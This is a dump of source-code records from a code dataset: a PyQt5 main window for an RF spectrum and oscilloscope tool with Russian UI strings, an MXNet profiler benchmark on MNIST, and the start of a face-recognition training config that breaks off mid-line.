+{"seq_id":"14522856369","text":"from mwui import Ui_MainWindow\nfrom PyQt5.QtWidgets import QMainWindow, QFileDialog, QVBoxLayout, QHBoxLayout, \\\n QHeaderView,QAbstractItemView, QMessageBox, QTableWidgetItem\nfrom PyQt5.QtCore import QThread, QTimer,pyqtSignal\nfrom PyQt5.QtGui import QIcon\nimport PyQt5.QtCore\n\nfrom DataHandler import DataHandler\nfrom DataReader import DataReader\n\nfrom PyQt5.QtWidgets import QAction, QMenu, QTableWidget, QGraphicsAnchorLayout, QToolButton\nfrom PyQt5.QtCore import Qt\nimport PyQt5.QtGui as gui\nfrom PyQt5.QtGui import QBrush, QColor, QPixmap\n\nfrom startform import StartFrom\n\nclass MW(QMainWindow, Ui_MainWindow):\n\n start_sig = pyqtSignal()\n stop_signal = pyqtSignal()\n exit_sig = pyqtSignal()\n\n del_marker_sig = pyqtSignal(int)\n add_markerpeak_sig = pyqtSignal()\n clear_mid_sig = pyqtSignal()\n\n def showInfoMe(self):\n from InfoMe import InfoMe\n self.inf = InfoMe()\n self.inf.show()\n\n def showMeasAll(self):\n self.measWid.tabWidget.setCurrentIndex(0)\n self.measWid.setMinimumSize(0, 150)\n self.measWid.setMaximumSize(1e5, 150)\n\n def genToolTipStyle(self, ptr):\n ptr.setStyleSheet(\"QToolTip { \\\n font-size:9pt; \\\n color:white; padding:2px; \\\n border-width:2px;\\\n border-style:solid;\\\n border-radius:20px;\\\n background-color: black;\\\n border: 1px solid white;}\")\n\n\n\n def readConf(self):\n\n from PyQt5.QtWidgets import QLineEdit, QCheckBox, QRadioButton, QComboBox\n\n try:\n f = open('conf.conf', 'r')\n\n for line in f:\n line = line.replace('\\n', '')\n\n line = line.split('\\t')\n\n if len(line) == 2: line.append('')\n\n name, typ, val = line\n\n\n if typ == 'QLineEdit':\n obj = self.startWid.findChildren(QLineEdit, name)[0]\n obj.setText(val)\n elif typ == 'QCheckBox':\n obj = self.startWid.findChildren(QCheckBox, name)[0]\n obj.setChecked(int(val))\n elif typ == 'QRadioButton':\n obj = self.startWid.findChildren(QRadioButton, name)[0]\n obj.setChecked(int(val))\n elif typ == 'QComboBox':\n obj = self.startWid.findChildren(QComboBox, name)[0]\n obj.setCurrentIndex(int(val))\n\n\n except:\n print('No conf file')\n\n def saveConf(self):\n\n from PyQt5.QtWidgets import QLineEdit, QCheckBox, QRadioButton, QComboBox\n\n listLine = self.startWid.findChildren(QLineEdit)\n listCheck = self.startWid.findChildren(QCheckBox)\n listRadio = self.startWid.findChildren(QRadioButton)\n listCombo = self.startWid.findChildren(QComboBox)\n\n\n f = open('conf.conf', 'w')\n\n for t in listLine:\n if not 'qt_' in t.objectName():\n f.write(t.objectName() + '\\tQLineEdit\\t'+ t.text() + '\\n')\n\n for t in listCheck:\n if not 'qt_' in t.objectName():\n if t.isChecked():\n val = 1\n else:\n val = 0\n f.write(t.objectName() + '\\tQCheckBox\\t' + str(val)+ '\\n')\n\n for t in listRadio:\n if not 'qt_' in t.objectName():\n if t.isChecked():\n val = 1\n else:\n val = 0\n f.write(t.objectName() + '\\tQRadioButton\\t' + str(val) + '\\n')\n\n for t in listCombo:\n if not 'qt_' in t.objectName():\n f.write(t.objectName() + '\\tQComboBox\\t' + str(t.currentIndex())+ '\\n')\n\n f.close()\n\n def initMenu(self):\n\n self.btnRun = QAction(QIcon(\"icon/n.png\"), \"actRun\", self)\n self.btnUpd = QAction(QIcon(\"icon/r.png\"), \"actUpd\", self)\n self.btnStop = QAction(QIcon(\"icon/s.png\"), \"actStop\", self)\n self.btnInfo = QAction(QIcon(\"icon/i.png\"), \"actStop\", self)\n\n self.btnConf = QAction(QIcon(\"icon/config.png\"), \"act1\", self)\n\n self.btnRun.setToolTip('Считать последовательно')\n self.btnUpd.setToolTip('Считать при изменении')\n\n 
self.btnStop.setToolTip('Остановить')\n self.btnInfo.setToolTip('Информация')\n self.btnConf.setToolTip('Настройка')\n\n self.toolbar = self.addToolBar(\"Run\")\n\n\n\n menu = QMenu()\n act1 = menu.addAction('Дельта-маркеры')\n act1.triggered.connect(self.showMeasAll)\n\n # -----\n\n\n # ----\n\n self.measTool = QToolButton(self.toolbar)\n self.measTool.setPopupMode(QToolButton.InstantPopup)\n self.measTool.setIcon(QIcon(\"icon/m.png\"))\n self.measTool.setMenu(menu)\n\n self.measTool.setToolTip('Измерения')\n\n self.toolbar.addAction(self.btnRun)\n self.toolbar.addAction(self.btnUpd)\n self.toolbar.addAction(self.btnStop)\n self.toolbar.addAction(self.btnConf)\n self.toolbar.addWidget(self.measTool)\n self.toolbar.addAction(self.btnInfo)\n\n self.genToolTipStyle(self.toolbar)\n\n self.btnRun.triggered.connect(self.actionRun)\n self.btnUpd.triggered.connect(self.actionUpd)\n self.btnStop.triggered.connect(self.actionStop_)\n self.btnInfo.triggered.connect(self.showInfoMe)\n self.btnConf.triggered.connect(self.acttionConfig)\n\n def acttionConfig(self):\n self.stopClicked()\n self.hide()\n self.startWid.show()\n\n def clearAllMark(self):\n table = self.newTableMark\n while table.rowCount():\n self.markerClickSlot(0, 4)\n\n def markerClickSlot(self, row, col):\n if col == 4:\n table = self.newTableMark\n id = int(table.item(row, 0).text().replace('M', ''))\n self.del_marker_sig.emit(id)\n table.removeRow(row)\n\n\n def stringCutter(self, str, cnt=3):\n pass\n\n def updateValsSlot(self, ID, freq, amp, width):\n freq = round(freq, 1)\n amp = int(amp)\n\n table = self.newTableMark\n\n for i in range(table.rowCount()):\n _id = int(table.item(i, 0).text().replace('M', ''))\n if _id == ID:\n\n if not table.item(_id, 3):\n return\n\n table.item(_id, 1).setText(str(freq))\n table.item(_id, 2).setText(str(amp))\n\n if width:\n table.item(_id, 5).setText('Width:' + str(width))\n else:\n table.item(_id, 5).setText('')\n\n break\n\n def stringCut(self, st, max):\n pass\n\n def addMarkerClickSlot(self, chanN, freq, amp, ID):\n table = self.newTableMark\n newID = table.rowCount()\n table.setRowCount(newID + 1)\n\n item = QTableWidgetItem()\n item.setText('M' + str(ID))\n table.setItem(newID, 0,item)\n\n freq = round(freq, 1)\n\n #amp = round(amp, 1)\n\n\n table.setItem(newID, 1, QTableWidgetItem(str(freq)))\n\n\n amp = int(amp)\n item = QTableWidgetItem()\n item.setText(str(amp))\n table.setItem(newID, 2, item)\n\n\n\n item = QTableWidgetItem()\n item.setText('Канал №' + str(chanN))\n item.setForeground(QBrush(QColor(self.colorsByInd[chanN][0],\\\n self.colorsByInd[chanN][1], self.colorsByInd[chanN][2])))\n table.setItem(newID, 3, item)\n\n item = QTableWidgetItem()\n item.setIcon(QIcon('icon/delete.png'))\n table.setItem(newID, 4, item)\n\n item = QTableWidgetItem()\n table.setItem(newID, 5, item)\n\n # item.setForeground(QBrush(QColor(0, 255, 0)))\n\n def initNewMark(self):\n self.newTableMark = QTableWidget(self.specWid.graphicsView)\n table = self.newTableMark\n\n # border: 0px solid #333333;\n\n table.setStyleSheet(\"QTableWidget { border: none;\"\n \" background-color: transparent; }\"\n \"QHeaderView::section {background-color: transparent;}\"\n \"QHeaderView {background-color: transparent;}\"\n \"QTableCornerButton::section {background-color: transparent;}\")\n\n table.cellClicked.connect(self.markerClickSlot)\n\n table.setShowGrid(False)\n\n table.setColumnCount(6)\n table.setRowCount(0)\n\n table.horizontalHeader().hide()\n table.verticalHeader().hide()\n\n table.resize(350, 290)\n 
table.move(60, 30)\n\n        table.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\n\n        table.setFocusPolicy(Qt.NoFocus)\n        # QAbstractItemView lives in QtWidgets (imported at the top), not QtGui;\n        # gui.QAbstractItemView raised AttributeError at runtime\n        table.setEditTriggers(QAbstractItemView.NoEditTriggers)\n\n        self.osclegTableWidget.setEditTriggers(QAbstractItemView.NoEditTriggers)\n        self.osclegTableWidget.setSelectionMode(QAbstractItemView.NoSelection)\n\n        from PyQt5.QtGui import QFont\n        font = QFont(\"times\", 10)\n        font.setBold(True)\n        table.setFont(font)\n\n        table.setColumnWidth(1, 50)\n\n        table.setColumnWidth(3, 400)\n        table.setColumnWidth(4, 10)\n\n\n        self.colorsByInd = {\n            0 : (255,0,0),\n            1 : (0,255,0),\n            2 : (0,0,255),\n            3 : (255,255,0),\n            4 : (0,255,255),\n            5 : (255,0,255),\n            6 : (128,128,0),\n            7 : (128,0,128)\n        }\n\n    def actionRun(self):\n        self.mode = 'step'\n        self.startClicked()\n\n    def actionUpd(self):\n        self.mode = 'check'\n        self.startClicked()\n\n    def actionStop_(self):\n        self.stopClicked()\n\n    def test(self):\n        print(1)\n\n    def generateLegendInit(self):\n        table1 = self.speclegTableWidget\n        table2 = self.osclegTableWidget\n        tables = [table1, table2]\n\n        for table in tables:\n\n            table.verticalHeader().setVisible(False)\n            table.setColumnCount(1)\n            table.setHorizontalHeaderLabels(['Список каналов'])\n            table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n\n        table1.cellClicked.connect(self.tableSpecClick)\n        table1.setEditTriggers(QAbstractItemView.NoEditTriggers)\n        table1.setSelectionMode(QAbstractItemView.NoSelection)\n\n        self.currChannel = None\n\n    def tableSpecClick(self, row, col):\n        table = self.speclegTableWidget\n\n        for i in range(table.rowCount()):\n            text = table.item(i, 0).text()\n            text = text.replace(' (активный)', '')\n            table.item(i, 0).setText(text)\n\n        if not table.rowCount():\n            return\n\n        text = table.item(row, 0).text()\n        text = text + ' (активный)'\n        table.item(row, 0).setText(text)\n\n        self.setActiveChanel(row)\n\n    def generateLegend(self, chanN):\n        from PyQt5.QtGui import QColor\n\n        table1 = self.speclegTableWidget\n        table2 = self.osclegTableWidget\n        tables = [table1, table2]\n\n        colors = self.specWid.colorsByInd\n\n        for table in tables:\n            table.setRowCount(chanN)\n            # Each table needs its own items: a QTableWidgetItem can belong to only\n            # one table, so the original single loop populated only the last table\n            for i in range(chanN):\n                item = QTableWidgetItem()\n                item.setText('Канал №' + str(i))\n\n                qcolor = QColor()\n                qcolor.setRgb(colors[i][0], colors[i][1],\n                              colors[i][2])\n\n                item.setBackground(qcolor)\n\n                table.setItem(i, 0, item)\n\n    def setActiveChanel(self, chanN):\n        self.chanN = chanN\n        self.specWid.setCurrChan(chanN)\n\n    def clearActiveChan(self):\n        self.chanN = None\n\n\n    def specCntPushButtonClicked(self):\n        self.oscWid.setOscLen(self.SPEC_cntSpinBox.value())\n\n    def drawOscCheckBoxToggl(self):\n        self.handler.setOscEn(self.drawOscCheckBox.isChecked())\n\n    def __init__(self):\n        super(MW, self).__init__()\n        self.setupUi(self)\n\n        from MeasClass import MeasClass\n        self.measWid = MeasClass()\n\n        self.initUI()\n\n\n\n\n\n        # newmark__\n        self.specWid.add_marker_sig.connect(self.addMarkerClickSlot)\n        self.specWid.update_marker_sig.connect(self.updateValsSlot)\n        self.del_marker_sig.connect(self.specWid.delMarkerSlot)\n        self.markerPeakPushButton.clicked.connect(self.specWid.addMarkerPeak)\n        # ----\n\n        self.specWid.error_sig.connect(self.showError)\n\n        self.clearSpecPushButton.clicked.connect(self.speclegTableWidgetClear)\n\n        self.drawOscCheckBox.setChecked(False)\n\n        self.initMenu()\n        self.initNewMark()\n        self.clearActiveChan()\n\n        self.initUpdReaderOnWork()\n\n        self.setOnWork(False)\n\n        self.drawOscCheckBox.toggled.connect(self.drawOscCheckBoxToggl)\n\n        # -------\n\n        
self.specWid.list_mark_sig.connect(self.measWid.updateMarks) # cnt\n self.specWid.mark_all_sig.connect(self.measWid.updMarkVals) # vals\n\n\n self.measWid.mark_width_sig.connect(self.specWid.setMarkerWidth)\n self.measWid.error_sig.connect(self.showError)\n\n self.hide()\n\n self.startWid = StartFrom(self)\n self.startWid.HIDE_SIG.connect(self.hideSlot)\n self.startWid.SHOW_SIG.connect(self.showSlot)\n\n self.startWid.START_RD_SIG.connect(self.actionRun)\n self.startWid.START_UPD_SIG.connect(self.actionUpd)\n self.startWid.STOP_SIG.connect(self.actionStop_)\n\n self.startWid.EXIT_SIG.connect(self.exitSlot)\n\n self.startWid.show()\n\n self.cntPushButton.clicked.connect(self.updReaderOnWork_cnt)\n self.specCntPushButton.clicked.connect(self.specCntPushButtonClicked)\n\n self.readConf()\n\n self.genPow2()\n\n\n self.opt_checkBox.stateChanged.connect(self.specWid.setOpt)\n\n self.pow2ComboBox.currentIndexChanged.connect(self.pow2Changed)\n\n #self.measTool.setEnabled(False)\n\n def genPow2(self):\n for i in range(10, 21):\n val = 2 ** i\n self.pow2ComboBox.addItem(str(val))\n\n def pow2Changed(self):\n val = self.pow2ComboBox.currentText()\n self.RD_cntSpinBox.setValue(int(val))\n\n def showSlot(self):\n self.showMaximized()\n\n def hideSlot(self):\n self.hide()\n\n def initUI(self):\n self.setUiDefault()\n self.fixUi()\n self.initSelectUi()\n self.initLayout()\n self.initSub()\n self.initSignals()\n self.generateLegendInit()\n\n def showInfo(self):\n from InfoWid import InfoWid\n self.info = InfoWid()\n self.info.show()\n\n\n\n def initSignals(self):\n self.clearOscPushButton.clicked.connect(self.oscWid.clear)\n self.clearSpecPushButton.clicked.connect(self.specWid.clear)\n self.info0PushButton.clicked.connect(self.showInfo)\n self.info1PushButton.clicked.connect(self.showInfo)\n\n\n\n def startSlot(self):\n self.setOnWork(True)\n\n\n\n\n\n def stopSlot(self):\n self.setOnWork(False)\n self.timer.stop()\n\n\n\n\n def setOnWork(self, state):\n self.onWork = state\n self.btnRun.setEnabled(not state)\n self.btnUpd.setEnabled(not state)\n self.btnStop.setEnabled(state)\n\n def clearLog(self):\n self.logTextBrowser.setText('')\n\n def log(self, newText):\n\n return\n\n txt = self.logTextBrowser.toPlainText()\n if txt == '':\n self.logTextBrowser.setText(newText)\n else:\n self.logTextBrowser.setText(txt + '\\n' + newText)\n\n def midChanged(self):\n self.handler.setMidCnt(int(self.midSpinBox.value()))\n\n def initSub(self):\n\n self.midSpinBox.valueChanged.connect(self.midChanged)\n\n self.rdr = DataReader()\n self.handler = DataHandler()\n self.timer = QTimer()\n\n self.rdr.data_signal.connect(self.handler.dataInSlot)\n self.handler.fft_signal.connect(self.specWid.dataIn)\n self.handler.osc_signal.connect(self.oscWid.dataIn)\n\n self.rdr.error_signal.connect(self.showError)\n\n self.specWid.data_first_sig.connect(self.setChanDef)\n\n self.exit_sig.connect(self.rdr.exitSlot)\n self.exit_sig.connect(self.handler.exitSlot)\n\n self.timer.timeout.connect(self.rdr.timerSlot)\n\n self.rdr.log_signal.connect(self.log)\n self.handler.log_signal.connect(self.log)\n\n\n self.handler.data_in_sig.connect(self.rdr.dataHandledSlot)\n\n self.start_sig.connect(self.startSlot)\n self.stop_signal.connect(self.stopSlot)\n\n\n\n # стоп сигнал от окна к ридеру\n self.stop_signal.connect(self.rdr.stopSlot)\n # стоп сигнал от ридера к хендлеру\n self.rdr.stop_signal.connect(self.handler.stopSlot)\n\n # стоп от хэндлера к окну\n self.handler.stop_signal.connect(self.stopSlot)\n\n 
self.clear_mid_sig.connect(self.handler.clearMidSlot)\n\n self.clearSpecPushButton.clicked.connect(self.clearAllMark)\n\n\n\n self.rdrTh = QThread()\n self.handlerTh = QThread()\n\n # запуск от окна к ридеру\n self.start_sig.connect(self.rdr.setStartFlg)\n # запуск от ридера к хендлеру\n self.rdr.start_signal.connect(self.handler.setStartFlg)\n\n\n\n self.rdr.moveToThread(self.rdrTh)\n self.handler.moveToThread(self.handlerTh)\n\n\n # запуск потоков - запуск ридера/хендлера\n self.handlerTh.started.connect(self.handler.run)\n self.rdrTh.started.connect(self.rdr.run)\n self.handlerTh.start()\n self.rdrTh.start()\n\n\n\n\n\n\n # --- timer\n\n\n\n\n def initLayout(self):\n self.setCentralWidget(self.tabWidget)\n\n\n self._lt0 = QVBoxLayout()\n self._lt0.addWidget(self.specWid)\n self._lt0.addWidget(self.measWid)\n\n self.lt0 = QHBoxLayout()\n self.lt0.addLayout(self._lt0)\n\n self.lt0.addWidget(self.controlSpecGroupBox)\n self.tabFFT.setLayout(self.lt0)\n\n self.lt1 = QHBoxLayout()\n self.lt1.addWidget(self.oscWid)\n self.lt1.addWidget(self.controlOscGroupBox)\n self.tabOsc.setLayout(self.lt1)\n\n\n\n def showError(self, text0):\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setText(text0)\n msg.setWindowTitle(\"Ошибка\")\n msg.exec_()\n\n def fixUi(self):\n\n pass\n\n\n\n\n def setUiDefault(self):\n self.drawOscCheckBox.setChecked(True)\n\n self.actionStart.setEnabled(True)\n self.actionStop.setEnabled(False)\n\n self.tabWidget.setCurrentIndex(0)\n\n def initSelectUi(self):\n self.actionStart.triggered.connect(self.startClicked)\n self.actionStop.triggered.connect(self.stopClicked)\n\n\n\n def RD_changed(self):\n if 0:\n self.rdTabWidget.setCurrentIndex(0)\n self.meanCheckBox.setEnabled(False)\n self.specClearMidPushButton.setEnabled(False)\n elif self.READ_stepRadioButton.isChecked():\n self.rdTabWidget.setCurrentIndex(1)\n self.meanCheckBox.setEnabled(True)\n self.specClearMidPushButton.setEnabled(True)\n elif self.RD_changeRadioButton.isChecked():\n self.rdTabWidget.setCurrentIndex(2)\n self.meanCheckBox.setEnabled(True)\n self.specClearMidPushButton.setEnabled(True)\n elif self.RD_timerRadioButton.isChecked():\n self.rdTabWidget.setCurrentIndex(3)\n self.meanCheckBox.setEnabled(True)\n self.specClearMidPushButton.setEnabled(True)\n\n\n def FOR_changed(self):\n if self.FOR_binRadioButton.isChecked():\n self.formTabWidget.setCurrentIndex(0)\n elif self.FOR_textRadioButton.isChecked():\n self.formTabWidget.setCurrentIndex(1)\n\n def SRC_changed(self):\n if self.SRC_onefileRadioButton.isChecked():\n self.SRC_tabWidget.setCurrentIndex(0)\n\n elif self.SRC_onefilechanRadioButton.isChecked():\n self.SRC_tabWidget.setCurrentIndex(1)\n\n\n elif self.SRC_filesRadioButton.isChecked():\n self.SRC_tabWidget.setCurrentIndex(2)\n\n elif self.SRC_sharedRadioButton.isChecked():\n self.SRC_tabWidget.setCurrentIndex(3)\n\n\n\n\n # ----------\n\n def setChanDef(self):\n self.tableSpecClick(0,0)\n\n\n def startClicked(self):\n self.parseParams()\n self.specWid.clearStart()\n self.oscWid.clearStart()\n self.start_sig.emit()\n\n\n\n\n\n\n def stopClicked(self):\n self.stop_signal.emit()\n\n def readParams(self):\n pass\n\n def saveClicked(self):\n\n f = open('cnf.cfg' ,'w')\n\n cnt = self.RD_cntSpinBox.text()\n f.write(cnt + '\\n')\n\n if self.SRC_onefileRadioButton.isChecked():\n f.write('0\\n')\n #elif self.SRC_filesRadioButton.isChecked():\n\n\n f.close()\n\n\n def speclegTableWidgetClear(self):\n\n if self.onWork:\n return\n\n table = self.speclegTableWidget\n\n while table.rowCount():\n 
table.removeRow(0)\n\n\n\n\n def SRC_chanNcomboBoxChange(self):\n table = self.SRC_chanTableWidget\n cnt = int(self.SRC_chanNcomboBox.currentText())\n table.setRowCount(cnt)\n\n\n\n for i in range(cnt):\n item = QTableWidgetItem()\n item.setText(str(i))\n item.setFlags(item.flags() & ~ PyQt5.QtCore.Qt.ItemIsEditable)\n table.setItem(i, 0, item)\n\n\n table.setItem(i, 1, QTableWidgetItem(''))\n\n item = QTableWidgetItem()\n item.setIcon(QIcon('icon/file.png'))\n item.setFlags(item.flags() & ~ PyQt5.QtCore.Qt.ItemIsEditable)\n table.setItem(i, 2, item)\n\n # ----------\n\n\n def parseParams(self):\n\n # --- как идут каналы\n\n if self.startWid.SRC_onefileRadioButton.isChecked():\n self.specWid.setChanN(1)\n self.oscWid.setChanN(1)\n self.measWid.setChan(1)\n self.generateLegend(1)\n chanN = 1\n files = [self.startWid.SRC_onefileSelectLineEdit.text()]\n elif self.startWid.SRC_onefilechanRadioButton.isChecked():\n pass\n elif self.startWid.SRC_filesRadioButton.isChecked():\n table = self.startWid.SRC_chanTableWidget\n chanN = int(self.startWid.SRC_chanNcomboBox.currentText())\n files = []\n for i in range(chanN):\n val = table.item(i, 1).text()\n files.append(val)\n\n self.specWid.setChanN(chanN)\n self.oscWid.setChanN(chanN)\n self.measWid.setChan(chanN)\n self.generateLegend(chanN)\n\n self._chanN = chanN\n self.measWid.setChan(chanN)\n self.rdr.setChanN(chanN)\n self.rdr.setFiles(files)\n\n # ----- комплексные ли\n\n isCompl = self.startWid.FOR_bincomplexCheckBox.isChecked()\n\n self.rdr.setIsCompl(isCompl)\n\n\n # ---- формат данных\n params = {}\n params['end'] = self.startWid.FOR_binendianComboBox.currentText()\n params['sign'] = self.startWid.FOR_binsignComboBox.currentText()\n params['ln'] = int(self.startWid.FOR_binsizeComboBox.currentText())\n\n self.rdr.setDataFromat(params)\n\n # --- режим чтения\n\n\n if self.mode == 'step':\n self.tim = 500\n self.rdr.setPauseStep(self.tim)\n\n self.rdr.setMode(self.mode)\n\n maxPnt = int(self.startWid.RD_cntSpinBox.text())\n self.rdr.setMaxPnt(maxPnt)\n self.handler.setFftEn(True)\n self.handler.setOscEn(self.drawOscCheckBox.isChecked())\n\n self.handlerUpdateParams()\n\n\n\n def setThePeak(self):\n val = float(self.peak_lineEdit.text())\n\n sz = self.peak_ComboBox.currentText()\n\n if sz == 'kHz':\n val = val * 1000\n elif sz == 'mHz':\n val = val * 1000000\n\n\n\n def initUpdReaderOnWork(self):\n self.complSpecCheckBox.toggled.connect(self.updReaderOnWork_isCompl)\n self.specWinComboBox.currentIndexChanged.connect(self.updReaderOnWork_win)\n\n # --\n\n def meanCheckBoxChanged(self):\n if self.meanCheckBox.isChecked():\n self.specClearMidPushButton.setEnabled(True)\n else:\n self.specClearMidPushButton.setEnabled(False)\n\n def updReaderOnWork_mid(self):\n self.handlerUpdateParams()\n self.clear_mid_sig.emit()\n\n def updReaderOnWork_cnt(self):\n maxPnt = int(self.RD_cntSpinBox.text())\n self.rdr.setMaxPnt(maxPnt)\n self.clear_mid_sig.emit()\n\n def updReaderOnWork_win(self):\n self.handlerUpdateParams()\n self.clear_mid_sig.emit()\n\n def updReaderOnWork_isCompl(self):\n self.handlerUpdateParams()\n self.clear_mid_sig.emit()\n\n\n def handlerUpdateParams(self):\n\n fs = int(self.startWid.fsLineEdit.text())\n\n if self.startWid.fsComboBox.currentText() == 'kHz':\n fs = fs * 1000\n elif self.startWid.fsComboBox.currentText() == 'MHz':\n fs = fs * 1000000\n\n\n\n ref = (2 ** int(self.startWid.FOR_binsizeComboBox.currentText())) / 2\n\n\n\n # yes\n win = self.specWinComboBox.currentText()\n isComplFFT = self.complSpecCheckBox.isChecked()\n chanN = 
self._chanN # cnt\n\n\n self.handler.setParams(chanN, fs, ref, isComplFFT, False)\n self.handler.setWindow(win)\n\n\n\n\n def sleep(self, val):\n from PyQt5.QtCore import QThread\n val = val * 100\n val = int(val)\n QThread.msleep(val)\n\n\n def exitSlot(self):\n t = 0.2\n self.stop_signal.emit()\n self.sleep(t)\n self.exit_sig.emit()\n self.sleep(t)\n self.rdrTh.quit()\n self.handlerTh.quit()\n self.rdrTh.wait()\n self.handlerTh.wait()\n self.startWid.close()\n\n self.saveConf()\n\n\n def closeEvent(self, event):\n event.ignore()\n self.stopClicked()\n self.hide()\n self.startWid.show()\n\n\n\n\n\n\n","repo_name":"lolizz00/RF_TOOL","sub_path":"MW.py","file_name":"MW.py","file_ext":"py","file_size_in_byte":25937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
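A minimal entry point for the window above; it assumes the sibling modules (`mwui`, `startform`, `DataReader`, `DataHandler`, `MeasClass`) are importable. Note that MW hides itself and shows the start form in its own __init__:

import sys
from PyQt5.QtWidgets import QApplication
from MW import MW

app = QApplication(sys.argv)
window = MW()  # shows StartFrom first; the main window appears after configuration
sys.exit(app.exec_())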
+{"seq_id":"720651975","text":"import mxnet as mx\nimport argparse\nimport os, sys\nimport time\nimport numpy as np\nfrom mxnet import profiler\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Set network parameters for benchmark test.')\n parser.add_argument('--profile_filename', type=str, default='profile_executor_5iter.json')\n parser.add_argument('--iter_num', type=int, default=5)\n parser.add_argument('--fc1', type=int, default=128)\n parser.add_argument('--fc2', type=int, default=128)\n parser.add_argument('--fc3', type=int, default=128)\n parser.add_argument('--fc4', type=int, default=128)\n return parser.parse_args()\n\n\ndef _download(data_dir):\n if not os.path.isdir(data_dir):\n os.system(\"mkdir \" + data_dir)\n os.chdir(data_dir)\n if (not os.path.exists('train-images-idx3-ubyte')) or \\\n (not os.path.exists('train-labels-idx1-ubyte')) or \\\n (not os.path.exists('t10k-images-idx3-ubyte')) or \\\n (not os.path.exists('t10k-labels-idx1-ubyte')):\n os.system(\"wget http://webdocs.cs.ualberta.ca/~bx3/data/mnist.zip\")\n os.system(\"unzip -u mnist.zip; rm mnist.zip\")\n os.chdir(\"..\")\n\n\ndef get_data(data_shape):\n data_dir = \"mnist/\"\n batch_size = 128\n if '://' not in data_dir:\n _download(data_dir)\n\n train = mx.io.MNISTIter(\n image = data_dir + \"train-images-idx3-ubyte\",\n label = data_dir + \"train-labels-idx1-ubyte\",\n input_shape = data_shape,\n batch_size = batch_size,\n shuffle = True,\n )\n\n val = mx.io.MNISTIter(\n image = data_dir + \"t10k-images-idx3-ubyte\",\n label = data_dir + \"t10k-labels-idx1-ubyte\",\n input_shape = data_shape,\n batch_size = batch_size,\n )\n\n return (train, val)\n\ndef get_symbol():\n data = mx.symbol.Variable('data')\n fc1 = mx.symbol.FullyConnected(data=data, name='fc1', num_hidden=args.fc1)\n act1 = mx.symbol.Activation(data=fc1, name='relu1', act_type='relu')\n fc2 = mx.symbol.FullyConnected(data=act1 , name='fc2', num_hidden=args.fc2)\n act2 = mx.symbol.Activation(data=fc2, name='relu2', act_type='relu')\n fc3 = mx.symbol.FullyConnected(data=act2 , name='fc3', num_hidden=args.fc3)\n act3 = mx.symbol.Activation(data=fc3, name='relu3', act_type='relu')\n fc4 = mx.symbol.FullyConnected(data=act3 , name='fc4', num_hidden=args.fc4)\n act4 = mx.symbol.Activation(data=fc4, name='relu4', act_type='relu')\n fc5 = mx.symbol.FullyConnected(data=act4 , name='fc5', num_hidden=10)\n net = mx.symbol.SoftmaxOutput(data=fc5 , name='softmax')\n return net, [('data', (128, 1, 28, 28))], [('softmax_label', (128, ))]\n\ndef get_module(ctx, sym, provide_data, provide_label, batch_size=None, is_train=True, use_memonger=False):\n if use_memonger:\n sym = search_plan(sym, data=data_shapes)\n mod = mx.mod.Module(symbol=sym,\n data_names=[name for name, _ in provide_data],\n label_names=[name for name, _ in provide_label],\n context=ctx)\n if batch_size is not None:\n provide_data = [(name, (batch_size,) + shape[1:]) for name, shape in provide_data]\n provide_label = [(name, (batch_size,) + shape[1:]) for name, shape in provide_label]\n if is_train:\n mod.bind(data_shapes=provide_data, label_shapes=provide_label, for_training=True, inputs_need_grad=False)\n else:\n mod.bind(data_shapes=provide_data, label_shapes=provide_label, for_training=False, inputs_need_grad=False)\n\n mod.init_params(initializer=mx.init.Xavier(magnitude=2.))\n mod.init_optimizer(optimizer='ccsgd',\n optimizer_params={\n 'learning_rate': 0.0001,\n 'momentum': 0.0,\n 'wd': 0.0\n })\n return mod\n\n\ndef benchmark(mod, dry_run=10, iterations=10):\n if 
len(mod._context) == 1:\n ctx = mod._context[0]\n else:\n ctx = mx.cpu()\n data = [mx.random.uniform(-1.0, 1.0, shape=shape, ctx=ctx) for _, shape in mod.data_shapes]\n label = [mx.nd.array(np.random.randint(1, 100, size=shape), ctx=ctx) for _, shape in mod.label_shapes]\n batch = mx.io.DataBatch(data, label)\n\n # dry run\n for i in range(dry_run):\n mod.forward(batch, is_train=True)\n mod.backward()\n for output in mod.get_outputs(merge_multi_context=False)[0]:\n output.wait_to_read()\n mod.update()\n\n t0 = time.clock()\n\n profiler.profiler_set_state('run')\n # real run\n for i in range(iterations):\n mod.forward(batch, is_train=True)\n mod.backward()\n mod.update()\n for output in mod.get_outputs(merge_multi_context=False)[0]:\n output.wait_to_read()\n profiler.profiler_set_state('stop')\n\n t1 = time.clock()\n return (t1 - t0)*1000.0 / iterations\n\n\ndef executor(num_iteration):\n sym, provide_data, provide_label = get_symbol()\n ctx = [mx.cpu(0)]\n mod = get_module(ctx, sym, provide_data, provide_label, batch_size=128)\n return benchmark(mod, iterations=args.iter_num)\n\n\nargs = parse_args()\n\nif __name__ == '__main__':\n mx.profiler.profiler_set_config(mode='symbolic', filename=args.profile_filename)\n print('profile file save to {0}'.format(args.profile_filename))\n print('executor num_iteration: {0}'.format(args.iter_num))\n executor_time = executor(args.iter_num)\n print(\"executor {0} ms / iteration\".format(executor_time))\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/profiler/profiler_executor.py","file_name":"profiler_executor.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"}
+{"seq_id":"27251099681","text":"from argparse import Namespace\nimport os\n\n\ndef get_config(dataset):\n config = Namespace()\n config.dataset = dataset\n config.embedding_size = 512\n config.sample_rate = 1\n config.fp16 = False\n config.momentum = 0.9\n config.weight_decay = 5e-4\n config.batch_size = 128\n config.mixup_batch_size = 10\n config.test_batch_size = 256\n config.lr = 0.4 # 0.4\n config.dropout = 0.5\n config.output = f\"ms1mv3_arcface_r50_lr{config.lr}_b{config.batch_size}_d{config.dropout}_mixup\"\n config.num_workers = 8\n\n # Train images preprocessed by MTCNN\n if config.dataset == 'APD':\n config.rec = \"APD1/train\"\n config.output = \"ckpt/\" + config.output\n config.num_classes = len(next(os.walk(config.rec))[1]) # 679\n config.num_image = 12899\n config.num_epoch = 40\n config.warmup_epoch = 1\n config.val_split = 0.2\n\n def lr_step_func(epoch):\n return ((epoch + 1) / (4 + 1)) ** 2 if epoch < config.warmup_epoch else 0.1 ** 